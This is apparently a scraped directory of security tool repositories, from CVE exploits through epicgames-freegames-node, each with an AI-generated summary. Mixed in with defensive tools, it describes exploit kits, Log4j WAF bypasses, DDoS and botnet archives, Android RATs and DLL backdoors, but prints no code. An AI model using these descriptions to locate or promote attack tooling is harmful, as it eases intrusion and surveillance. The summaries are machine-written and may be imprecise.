AI Summary: The CVE PoC tool aggregates nearly every publicly available Proof-of-Concept (PoC) for Common Vulnerabilities and Exposures (CVEs), providing a comprehensive database of exploits for security professionals. It employs automated workflows to scrape and validate CVE details from various sources, including GitHub and HackerOne reports, while also allowing users to browse, search, and monitor PoCs for specific vulnerabilities. Noteworthy features include real-time updates, easy-to-read markdown documentation, and the ability to generate GitHub badges for affected software versions.

CVE-2020-0796

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CVE-2020-0796 is a Windows SMBv3 local privilege escalation exploit that targets a vulnerability in the SMB protocol, enabling unauthorized users to elevate their permissions. The tool includes proof of concept (PoC) and analysis references for users seeking to understand and replicate the exploit. Notable features include detailed documentation and references to further resources for in-depth exploitation and analysis of the vulnerability.

README

CVE-2020-0796

Windows SMBv3 LPE Exploit

CVE-2021-44228-PoC-log4j-bypass-words

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The CVE-2021-44228-PoC-log4j-bypass-words tool demonstrates various methods to exploit the Apache Log4j vulnerability, specifically focusing on bypassing WAF protections and patched versions. It provides multiple techniques, including the use of system environment variables, case manipulation, and invalid Unicode to obfuscate the exploit strings. Notable features include dynamic manipulation of Java naming lookups and the ability to use non-existent lookups for stealthy exploitation attempts.

README

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on

🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tricks

📝 Description

CVE-2021-44228 works on:

CVE-2023-38831-winrar-exploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The CVE-2023-38831 winrar exploit generator is a tool designed to create proof-of-concept (PoC) exploits for a recently discovered vulnerability in WinRAR versions up to 6.22. It allows users to customize bait files, such as images or documents, along with malicious script files to generate a malicious RAR archive. Notable features include an easy-to-use command-line interface for generating exploits and the ability to customize payloads according to user specifications.

CVE-2024-1086

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CVE-2024-1086 is a universal local privilege escalation exploit targeting Linux kernels from v5.14 to v6.6, with a notable success rate of 99.4% in KernelCTF environments. It allows users to gain root access under specific conditions related to user namespaces and kernel configurations, while also showcasing a deliberate kernel panic after execution to deter malicious exploitation. The tool includes both source code for building as well as a compiled binary for ease of use.

cve-bin-tool

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CVE-bin-tool is a static analysis tool designed to identify vulnerable dependencies in binary artifacts by comparing them against known Common Vulnerabilities and Exposures (CVEs). Its primary use case is to streamline the security assessment process in software projects, enabling developers to detect and remediate vulnerabilities efficiently. Notable features include support for various package formats, a comprehensive vulnerability database, and integration capabilities with CI/CD pipelines for automated security checks.

CyberSecurity

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The CyberSecurity repository offers a comprehensive collection of resources and tools aimed at individuals interested in cybersecurity, encompassing a wide range of topics from security models and threat identification to practical tools for ethical hacking. Notable features include a curated list of command-line and graphical user interface tools for pentesting, along with educational content covering ethical and legal aspects, security frameworks, and network fundamentals. This repository serves as a valuable reference for both newcomers and experienced professionals in the cybersecurity domain.

cybersecurity-career-path

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The cybersecurity-career-path repository provides a comprehensive guide to various career trajectories within cybersecurity, detailing essential skills, training, and resources for both offensive and defensive roles. Notable features include a structured overview of job titles, practical utilities, and a free platform called Career Coach for personalized career advancement. It serves as a valuable resource for individuals at any stage of their cybersecurity journey.

README

UPDATE: We’ve expanded our repository with complete career paths, essential skills training, and a ton of practical utilities and materials named Career Coach ; all available for free! Whether you’re just starting out or looking to level up, enroll in any career path at no cost, keep progressing, and fuel your professional growth with these comprehensive tools designed to help you succeed. Check out our app for seamless access and personalized guidance! Career Coach

Cybersecurity Career Path ⬆️

Cybersecurity-Projects

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Cybersecurity Projects repository offers a collection of 67 hands-on projects spanning from beginner to advanced levels, designed to enhance practical skills in cybersecurity. It includes structured certification roadmaps for various roles within the field, as well as a comprehensive array of learning resources such as tools, courses, and frameworks for cybersecurity professionals. Notable features include the full source code availability for projects, covering diverse topics like port scanning, keylogging, and encryption techniques.

CyberStrikeAI

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CyberStrikeAI is an AI-integrated security testing platform developed in Go, designed for automated vulnerability discovery and attack-chain analysis. It features a vast integration of over 100 security tools, AI-driven orchestration, role-based testing, and lifecycle management to create a collaborative and auditable environment for security teams. Notable features include a web console, AI decision engine with OpenAI compatibility, detailed vulnerability management, and a comprehensive knowledge base for enhanced security expertise.

Damn-Vulnerable-Bank

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Damn Vulnerable Bank is an intentionally vulnerable Android application designed to educate users on security flaws in banking apps. Its primary use case is for security professionals and developers to explore various vulnerabilities, such as root detection and insecure storage, by interacting with features like user registration, fund transfers, and transaction history. Notable features include fingerprint and PIN verification for transactions, as well as a gamified approach to discovering hidden vulnerabilities within the app.

DataSurgeon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DataSurgeon is a comprehensive tool for extracting sensitive information pertinent to incident response, DLP, penetration testing, and CTF challenges. It supports extraction of a wide range of data types—including emails, credit cards, URLs, and various hashes—across multiple operating systems, and features a plugin management system that allows users to extend its functionality. Notable features include recursive file analysis, CSV output capabilities, and multi-platform support enabling usage on Windows, Linux, and macOS.

DDexec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DDexec is a sophisticated tool designed for executing binaries by manipulating existing processes on Linux systems, utilizing memory hijacking techniques. Its notable features include the ability to run machine code directly, support for various shells, and the option to replace traditional file access methods with alternative seeking tools, which can obfuscate executable detection. The utility’s architecture minimizes dependencies, enhancing performance and potentially expanding compatibility to platforms like Android.

ddisasm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DDisasm is a high-performance disassembler that accurately translates binaries from ELF and PE formats into a reassemblable assembly code representation using the GTIRB intermediate format. Utilizing the Datalog declarative logic programming language, it derives code locations, symbolization, and function boundaries, supporting multiple instruction set architectures including x86, ARM, and MIPS. Notable features include Docker support for easy setup and integration with GTIRB for further binary analysis and manipulation.

DDoS-Ripper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DDoS-Ripper is a Python-based tool designed to simulate Distributed Denial-of-Service (DDoS) attacks for educational and testing purposes. It supports various operating systems, including Linux, Termux, Windows, and MacOS, and allows users to specify the target IP address and intensity of the attack through command line parameters. Notable features include multi-platform compatibility and straightforward installation instructions, emphasizing an ethical usage disclaimer.

README

DDoS-Ripper

What is a DDoS Attack?

A Distributable Denied-of-Service (DDOS) attack server that cuts off targets or surrounding infrastructure in a flood of Internet traffic

DDOS-RootSec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The RootSec Archive is a comprehensive collection of tools and resources designed for conducting Distributed Denial-of-Service (DDoS) attacks, vulnerability scanning, and botnet management. Notable features include a variety of botnet variants (such as Mirai and QBot), password cracking tools, real-time statistics through DStat, and C2 sources for effective botnet control. This archive serves both as a point of reference and a toolkit for security testing and exploitation practices.

DeathStar

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DeathStar is a Python script designed to automate the exploitation of misconfigurations within Active Directory environments to attain Domain and Enterprise Admin rights by leveraging the RESTful API of the Empire framework. Notable features include a plugin system for extensibility, support for multiple Active Directory domains and forests, real-time adaptive monitoring during attacks, and a fully asynchronous operation model. This tool aims to provide a comprehensive solution for demonstrating prevalent Active Directory vulnerabilities in a reliable and non-disruptive manner.

DeauthDetector

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DeauthDetector is an open-source tool designed to monitor and detect Wi-Fi deauthentication attacks using an ESP8266 microcontroller. Its primary use case involves real-time identification of malicious deauth frames, indicated by an LED activation, making it an effective low-cost solution for network security monitoring. Notable features include customizable scanning options, support for multiple channels, and easy installation via precompiled binaries or Arduino integration.

README

DeauthDetector

Detect deauthentication frames using an ESP8266

debundle

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Debundle is a tool designed to unpack JavaScript bundles generated by Webpack and Browserify, facilitating reverse engineering and analysis by converting minified code back into a more readable file structure. Notably, it allows users to specify configuration options for various bundling types and outputs organized directories containing the original modules, though it does not guarantee a lossless recovery of the original source code. The project is no longer maintained, and users are advised to exercise caution as it may not perform reliably on all real-world bundles.

Decepticon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Decepticon is a Vibe Hacking agent designed to streamline the red teaming process by utilizing AI to automate repetitive tasks such as scanning, service enumeration, and executing multi-stage attacks. Its primary use case is in penetration testing, where it simulates real-world attack scenarios to evaluate an organization’s security posture effectively. Notable features include the ability to handle the full kill chain, integrate with AI API keys, and operate within a Docker environment for ease of deployment.

DedSec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The DedSec Project is an educational toolkit designed for Android using Termux, integrating various scripts, utilities, and local web interfaces to facilitate learning about cybersecurity tools and workflows. It aims to enhance users’ understanding of defensive awareness through practical exercises and organized scripts, while supporting both English and Greek interfaces. Notable features include a comprehensive installation guide, diverse categories of tools, and a focus on educational usage, including personal information capture and simulated environments.

deepce

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DeepCE is a lightweight tool designed for Docker container enumeration, privilege escalation, and container escapes, written in pure shell script to maximize compatibility. It performs a variety of enumerations, including container-specific data collection and host system scanning, and offers multiple exploits such as Docker group privilege escalation and command execution in privileged mode. Notably, DeepCE minimizes disk writes during enumeration, making it suitable for stealthy assessments in containerized environments.

DeepTraffic

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DeepTraffic is a toolkit that employs deep learning models specifically for the classification of network traffic, focusing on identifying malware and anomalies. Its primary application lies in enhancing cybersecurity measures through effective traffic analysis and representation learning using convolutional neural networks. Notable features include end-to-end encrypted traffic classification and the ability to learn hierarchical spatial-temporal features for improved intrusion detection.

README

Deep Learning models for network traffic classification

For more information please read our papers.

DefaultCreds-cheat-sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Default Credentials Cheat Sheet is a tool designed for penetration testers and blue teamers, providing a comprehensive repository of default login credentials for various products to aid in security assessments. Notable features include a searchable database of over 3,700 default credentials, the ability to export results for use in brute force attacks, and automated updates to maintain current data. The tool is easily installable via pip and supports operations across multiple operating systems.

DEFCON-31-Syscalls-Workshop

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The DEFCON 31 Syscalls Workshop repository provides educational materials focusing on direct and indirect syscalls within Windows operating systems, particularly aimed at enhancing understanding of Win32 and Native APIs for Red Team activities. It includes theoretical content, practical exercises, and proof of concepts (POCs) to facilitate learning about syscall mechanisms and their implications in EDR evasion. Notable features include an emphasis on manual techniques over complex automation, offering foundational insights into call stacks and shellcode execution dynamics.

DeimosC2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DeimosC2 is a deprecated post-exploitation Command & Control (C2) tool designed to facilitate control over compromised machines across multiple operating systems including Windows, macOS, and Linux. Its notable features include dynamic agent generation, diverse communication methods (TCP, HTTPS, DoH, and QUIC), a graphical interface for managing listeners and agents, and robust security measures such as multi-user support and two-factor authentication. However, it is important to note that the tool has a known XSS vulnerability and is no longer maintained.

dembrandt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dembrandt is a command-line tool designed to extract design systems from any website into structured design tokens, including elements such as colors, typography, and components. Its notable features include the ability to generate a brand guide PDF, output data in W3C Design Tokens format, and support for various browser configurations to bypass bot protection on target sites. The tool is easily installed via npm and offers a range of options for customization and output format.

dep-scan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OWASP dep-scan is an advanced security audit tool designed for analyzing project dependencies against known vulnerabilities, advisories, and license issues, applicable to both local repositories and container images. Its primary use case is to facilitate integration within Application Security Posture Management (ASPM) and Vulnerability Management (VM) platforms, especially in Continuous Integration (CI) environments. Notable features include advanced reachability analysis, fast local vulnerability scanning without a server, generation of Software Bills of Materials (SBOM), and clear insights for prioritization of vulnerabilities.

destroylist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Destroylist is a comprehensive phishing and scam domain blacklist that provides real-time threat intelligence to protect users globally. This tool maintains an extensive database of over 100,000 phishing domains and features active statistics on domain additions and removals, ensuring up-to-date protection against online threats. The repository supports community contributions, fostering collaborative efforts in enhancing online security.

README

Destroylist: Phishing & Scam Domain Blacklist

DetectDee

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DetectDee is a reconnaissance tool designed to track down social media accounts using identifiers such as usernames, emails, and phone numbers across various social networks. Notable features include precise control over request handling to evade web application firewalls, support for multiple input types for user detection, and the option for integration with ChatGPT for enhanced result tagging. Its extensibility and ease of use make it suitable for cybersecurity practitioners in their investigations.

dethrace

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dethrace is a recreation project aimed at reverse-engineering the 1997 game Carmageddon to enable it to run natively on contemporary systems. The tool supports building with CMake and SDL2, and allows users to leverage original game assets or demo versions for gameplay. Notably, it offers configuration options through an INI file and supports CD audio playback from compatible folders, enhancing the authenticity of the gaming experience.

README

Dethrace

device-activity-tracker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Device Activity Tracker is a proof-of-concept tool designed for the analysis of WhatsApp and Signal user activity through Round-Trip Time (RTT) measurement of message delivery receipts. Its primary use case is to uncover privacy vulnerabilities in these messaging apps by detecting user activity levels, device state, and potential location changes, all while presenting real-time data through an accessible web interface. Notable features include an easy setup via Docker, a client-server architecture, and a CLI option for direct tracking of WhatsApp users.

devops-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “devops-tools” repository is a curated compilation of the most effective and popular DevOps tools for 2024, aimed at enhancing development and operational workflows. It categorizes tools into various segments such as Continuous Integration, Containerization, and Monitoring, providing brief descriptions to assist users in identifying the right tools for their needs. Notably, the repository encourages community contributions to continuously improve the list of resources available.

README

Curated List of Best DevOps Tools for 2024

A curated collection of the most effective and popular DevOps tools to streamline your development and operations processes for 2024

dexcalibur

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dexcalibur is an advanced Android reverse engineering platform that focuses on automating dynamic instrumentation for improved analysis. Its notable features include the ability to decompile and disassemble intercepted bytecode at runtime, manage multiple hooks, and perform static analysis with its built-in engine capable of executing smali code. This tool is designed to streamline the tedious tasks associated with dynamic analysis, making it essential for security researchers and developers.

DGFraud

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DGFraud is a Graph Neural Network (GNN) toolbox designed for detecting fraud in various systems by integrating and comparing state-of-the-art GNN-based models. Its primary use case lies in enhancing the efficacy of fraud detection mechanisms through advanced graph-based methodologies. Notable features include a modular architecture for implementing new models, comprehensive documentation on existing algorithms, and support for TensorFlow 2.0, allowing seamless integration into existing projects.

README

Dictionary-Of-Pentesting

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Dictionary-Of-Pentesting is a comprehensive collection of dictionaries designed for penetration testing, vulnerability discovery, brute force attacks, and fuzzing. It categorizes resources such as authentication, file paths, ports, domains, and various default credentials, and continuously expands its listings to include regex patterns, user credentials, and application-specific payloads. Notable features include a broad range of default password lists, HTTP parameter enumeration, and the inclusion of specific patterns for cloud services and common vulnerabilities.

Digital-Forensics-Guide

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Digital Forensics Guide serves as a comprehensive resource for those engaged in digital forensics, providing a compilation of applications, libraries, and tools essential for effectively conducting forensic investigations. The guide includes sections on various forensic fields such as computer, mobile, and network forensics, along with curated lists of tutorials, certifications, and frameworks to enhance practitioners’ skills and knowledge. Notable features include playbooks for practical application and a structured format for easy navigation through key topics.

diodb

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Diodb is a community-driven, vendor-agnostic database designed to catalog Vulnerability Disclosure Programs (VDPs) and Bug Bounty Programs (BBPs), including essential details such as contact information, policy locations, and reward structures. It facilitates streamlined engagement between security researchers and organizations, promoting best practices like Safe Harbor for ethical hacking. Notable features include a searchable front-end interface, options to download raw data in JSON format, and tools for generating VDPs easily.

dirhunt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dirhunt is a web crawling tool designed to search for and analyze directories on web servers, identifying interesting content even when directory listings are disabled. It efficiently detects false 404 errors and empty index files while minimizing server requests, supporting features such as multiple site processing, detection of redirectors, and integration with various data sources for enhanced directory discovery. The tool is aimed at audit teams and is intended for use on owned or authorized servers only.

dirmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dirmap is an advanced web directory scanning tool designed for comprehensive directory discovery and vulnerability assessment, surpassing the capabilities of tools like DirBuster and Dirsearch. Its notable features include support for concurrent scanning across multiple targets and payloads, recursive scanning with customizable status code triggers, dynamic dictionary creation through web crawling, and extensive configuration options for request handling and response processing. This makes Dirmap particularly effective for security professionals conducting thorough penetration testing and vulnerability assessments on web applications.

discover

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Discover is a customizable suite of bash scripts designed to automate various tasks in penetration testing, including recon, scanning, enumeration, and malicious payload creation with Metasploit, ideal for use on Kali Linux or Ubuntu systems. Notable features include multiple reconnaissance options for domains and persons, automated scanning tools that utilize Nmap and other utilities, and web application testing facilities incorporating tools like Nikto and SSL analysers. The tool simplifies complex penetration testing workflows through an organized menu structure, enabling swift task execution.

DllShimmer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DllShimmer is a tool designed to facilitate DLL hijacking by allowing users to backdoor any function in a DLL without disrupting the normal operation of the host program. It generates proxy DLLs through a boilerplate C++ file and a corresponding .def file, ensuring that all exported functions maintain their original names and ordinal numbers, thus avoiding detection. Key features include support for both dynamic and static linking, the option to prevent multiple executions of the backdoor, and comprehensive debug logging capabilities.

dnsgen

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DNSGen 2.0 is an advanced DNS name permutation engine tailored for security researchers and penetration testers, facilitating subdomain discovery and security assessments through the generation of intelligent domain name variations. Notable features include a smart domain name permutation engine, support for custom wordlists, multiple sophisticated permutation techniques such as word affixing and cloud-specific patterns, and integration capabilities with tools like MassDNS for efficient domain resolution.

README

DNSGen 2.0 - Advanced DNS Name Permutation Engine 🚀

dnstwist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: dnstwist is a DNS-centric tool designed for domain name permutation and reconnaissance, allowing security researchers to discover potential phishing domains and domain variations. Its primary use case is to enhance domain security assessments by identifying lookalike domains and subdomain enumeration. Notable features include support for various DNS record lookups, historical data integration, and API access for automation.

README

docs/README.md

dockle

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dockle is a container image linter designed to enhance the security and compliance of Docker images by identifying vulnerabilities and recommending adherence to best practices, including CIS Benchmarks. It offers a simple command-line interface for scanning images, supports integration with CI/CD pipelines, and provides detailed checkpoint reports regarding security issues and Dockerfile practices. Notable features include vulnerability detection and the ability to customize scan parameters for fine-tuning results.

DogeRat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DogeRat is an advanced Android remote administration tool (RAT) that enables real-time control over Android devices through a Telegram-based interface without the need for port forwarding. Notable features include the ability to send and receive messages, capture multimedia, access location data, manage contacts, and utilize keylogger functionality, with additional capabilities available in its paid version, such as encryption and undetectable injections. The tool is intended solely for educational purposes and boasts a comprehensive set of functionalities for thorough device management.

domain-digger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Domain Digger is a comprehensive domain analysis toolkit designed to provide detailed insights into domain information through a user-friendly interface. Its primary use case includes performing DNS lookups, WHOIS inquiries, and IP geolocation, while notable features include intelligent search suggestions, a visual DNS map, and support for multiple DNS resolvers, enhancing both the depth and efficiency of domain investigations.

README

Do you enjoy using Domain Digger? Leave a star! 🌟

domloggerpp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DOMLoggerpp is a browser extension designed for monitoring, intercepting, and debugging JavaScript sinks through customizable configurations. It features regex-based domain management, flexible hooking options, on-demand debugging breakpoints, a dynamic notification system, and an integrated Devtools log panel for enhanced log management and filtering. This tool is especially useful for developers and security professionals looking to analyze and debug JavaScript execution flows within web applications.

README

A browser extension that allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations.

Dorks-collections-list

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dorks-collections list is a comprehensive repository that aggregates various search engine dorks tailored for cybersecurity professionals, penetration testers, and researchers. It features organized links to dork lists across multiple platforms such as Google, Shodan, and GitHub, facilitating targeted searches for sensitive data and vulnerabilities. Notable features include specific sections for different types of dorks, including those for detecting sensitive files, SQL injection vulnerabilities, and administrative panels, alongside automation tools and browser extensions for streamlined usage.

dotenv

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dotenv is a lightweight Node.js module that simplifies the management of environment variables by loading them from a .env file into process.env. Its primary use case is to separate application configuration from code, following best practices as outlined in The Twelve-Factor App methodology. Notable features include support for multiline values, custom path configuration, and the ability to preload the module without explicit imports in application code.

README

dotenv

Dotenv is a zero-dependency module that loads environment variables from a .env file into process.env. Storing configuration in the environment separate from code is based on The Twelve-Factor App methodology.

dotenvx

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dotenvx is a secure dotenv tool that allows developers to manage environment variables across multiple platforms and programming languages. Its primary use case is to enhance the safety and flexibility of environment variable handling by providing support for encrypted environment files and easy integration into existing applications. Notable features include cross-platform compatibility, multi-environment management, and straightforward installation options via various package managers and direct execution methods.

README

doublepulsar-detection-script

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The DoublePulsar Detection Script is a Python tool designed to identify the presence of the DoublePulsar implant on systems through SMB and RDP protocols. It supports scanning single IPs or lists of IPs with multi-threading capabilities, and includes functionality for remote uninstall of the implant for remediation. Key features include detection capabilities for both protocols, an early release for urgent network compromise identification, and associated Snort signatures for enhanced detection.

dpt-shell

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: dpt-shell is an Android Dex protection tool designed to hollow out method implementations within DEX files, facilitating runtime reconstruction for enhanced protection of Android applications. Primary use cases include securing APKs and AABs against reverse engineering, with notable features such as customizable protection configurations, exclusion of specific ABIs, and the ability to dump DEX code items for analysis.

README

dpt-shell

English | 简体中文

dpt-shell is an Android Dex protection shell that hollows out Dex method implementations and reconstructs them at runtime.

dradis-ce

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dradis is an open-source collaboration framework designed for automated penetration testing report generation, enabling InfoSec teams to streamline reporting processes by importing data from various security tools like Burp Suite and Nessus. Its notable features include platform independence, markup support for notes, and a powerful extensions interface that enhances flexibility and usability. Dradis aims to generate consistent and professional pentest reports while minimizing manual efforts, thereby allowing teams to focus on analysis and recommendations.

drakvuf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DRAKVUF is an agentless, virtualization-based binary analysis tool designed for in-depth execution tracing of arbitrary binaries, including operating systems. Its primary use case is malware analysis, leveraging minimal footprint to remain stealthy during the examination process while supporting a range of Windows and Linux environments. Notable features include the ability to operate without installing additional software in the virtual machine and compatibility with hardware virtualization extensions in Intel CPUs.

droidReverse

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: droidReverse is a comprehensive toolkit for Android reverse engineering, integrating multiple tools for decompiling APK files and analyzing bytecode. Its primary use case is facilitating the examination and modification of Android applications by converting APKs to readable formats and supporting various analysis capabilities, including malware detection. Notable features include support for multiple decompilation techniques, a graphical user interface for various tools, and capabilities for dynamic editing and package management.

dronesploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: DroneSploit is a command-line interface framework designed for penetration testing of light commercial drones, leveraging techniques and exploits similar to Metasploit. It allows users to interactively conduct security assessments on drone systems, with features that include a variety of modules for specific drone payload alterations such as changing passwords or SSIDs. The framework’s structure facilitates easy extension and integration of new hacking techniques.

README

DroneSploit

Easily pentest drones.

DumpsterFire

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The DumpsterFire Toolset is a cross-platform, modular tool designed for creating automated, time-delayed security events suitable for both Red and Blue Team exercises. Its primary use case is to facilitate realistic cyber incident simulations and training by allowing users to build customizable event chains that can generate network and filesystem artifacts, enhancing incident response capabilities. Notable features include dynamic extensibility for adding custom event modules, a menu-driven interface for ease of use, and the ability to run exercises in a controlled manner without direct supervision.

dumpulator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dumpulator is a dynamic code emulation library designed for analyzing minidump files, facilitating the reverse engineering of malware and other binaries. Its primary use case includes emulating function calls and tracing execution paths within dumped memory structures, allowing users to decrypt strings and execute code snippets easily. Notable features comprise memory allocation, UTF-16 string reading, and the ability to trace execution for debugging purposes, all while presenting a clean interface for integration within Python scripts.

Dwarf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Dwarf is a versatile debugger designed for reverse engineers, crackers, and security analysts, facilitating the analysis of applications on various platforms, including Android, iOS, and local environments. Leveraging PyQt5 and Frida, it offers features such as a debugging UI, session management with agent integration, and the ability to trace Java and native functions, enabling users to conduct detailed investigations into application behavior. Additionally, Dwarf supports scripting with a dedicated API that enhances productivity through autocompletion and inline documentation.

e9patch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: E9Patch is a static binary rewriting tool designed for x86_64 Linux ELF binaries that enables users to modify and patch binaries without introducing dependencies, making the output a drop-in replacement. Notable features include its scalability for large binaries, fast rewriting capability, low overhead performance, and programmability for integration with other projects. With functionalities such as instruction instrumentation and various supported modes, E9Patch can effectively enhance binary behavior for tasks such as fuzzing and system call interception.

edb-debugger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: edb-debugger is a cross-platform debugger that supports AArch32, x86, and x86-64 architectures, facilitating development and debugging across multiple operating systems, with Linux as the officially supported platform. Notable features include a user-friendly interface, compatibility with modern compilers and libraries, and ongoing development for additional platforms such as FreeBSD, OpenBSD, OSX, and Windows. The tool aims to replicate and extend the capabilities of Ollydbg while adding multi-architecture support.

README

eDBG

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: eDBG is a lightweight CLI debugger based on eBPF, designed for Android ARM64 platforms, which offers enhanced resistance to anti-debugging mechanisms compared to traditional ptrace-based debuggers. Its notable features include a user-friendly CLI interface akin to pwndbg, support for standard debugging functionalities, and a file and offset-based breakpoint registration system that facilitates fast startup and multi-threaded or multi-process debugging. Additionally, eDBG operates without direct program attachment, enabling stable dynamic analysis with minimal intrusion.

efiXplorer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: efiXplorer is an IDA plugin and loader designed for the analysis and automation of reverse engineering UEFI firmware. Its primary use case is to facilitate the discovery of vulnerabilities in UEFI firmware through automated static analysis, and it provides features that enhance the recovery of service function calls within such firmware. Notably, it supports integration with various hex-ray tools and includes comprehensive documentation for installation and usage.

README

EggShell

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: EggShell is a post-exploitation surveillance tool developed in Python, designed for establishing command line sessions on target machines with extended functionalities. Notable features include file uploading/downloading, tab completion, command execution, photo capturing, and device location tracking, with enhanced security through SSL and support for Linux and iOS in version 3.0.0. This tool serves as a proof of concept for penetration testing on devices that users own.

README

EggShell

About

EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.

ElectricEye

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ElectricEye is a comprehensive Python CLI tool designed for multi-cloud and multi-SaaS environments that focuses on Asset Management, Security Posture Management, and Attack Surface Monitoring. It supports over 100 services and conducts more than 1000 checks aligned with over 20 regulatory and best practice frameworks, enabling organizations to enhance their cloud security and compliance effortlessly. Notable features include cross-Account, cross-Region capabilities and support for major platforms like AWS, GCP, Azure, and more, making it a versatile solution for managing diverse cloud architectures.

elpscrk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Elpscrk is an intelligent password generation tool designed to create permutations based on user-provided information about a target, effectively generating potential passwords through statistical methodologies. It offers six complication levels ranging from simple to highly complex, enabling tailored password generation based on the user’s customization needs. Notably, Elpscrk is memory efficient and capable of producing up to one million password combinations, making it a powerful option for password profiling and security analysis.

EmailAll

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: EmailAll is a powerful email collection tool designed to aggregate email addresses from various online sources, including search engines and datasets. Its primary use case is to support cybersecurity professionals in gathering emails for domain reconnaissance, and it features integration with multiple API services for data retrieval along with modular results storage in JSON format. The tool allows easy configuration for proxies and APIs, enhancing its flexibility for various deployment environments.

emploleaks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: EmploLeaks is an Open Source Intelligence (OSINT) tool that facilitates the gathering of employee information from companies, primarily utilizing LinkedIn to extract employee lists and personal email addresses. Notable features include the ability to search a custom COMB database for leaked passwords using the retrieved emails, and an extension for identifying personal code repositories on GitLab. The tool requires Python for installation and offers a user-friendly command-line interface for executing its functionalities.

EntityFramework-Reverse-POCO-Code-First-Generator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The EntityFramework Reverse POCO Code First Generator is a tool designed to reverse engineer existing databases and generate fully customizable Entity Framework Code First POCO classes along with configuration mappings and DbContext setups. Its primary use case is to facilitate the rapid creation of data access code that mimics hand-crafted designs, enhancing readability and maintainability. Notable features include support for multiple database types (including SQL Server and PostgreSQL), customizable output through template files, and integration with Visual Studio via a VSIX installer.

enum4linux-ng

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: enum4linux-ng is an advanced enumeration tool designed for extracting information from Windows and Samba systems, primarily targeted at security professionals and CTF participants. It builds on the capabilities of the original enum4linux by incorporating enhanced output parsing, allowing for findings to be exported in YAML or JSON formats, and implementing features such as multiple authentication methods, smart enumeration, and support for both IPv6 and SMBv1.

README

enum4linux-ng

A next generation version of enum4linux

epicgames-freegames-node

Mon, 30 Mar 2026 00:00:00 +0000

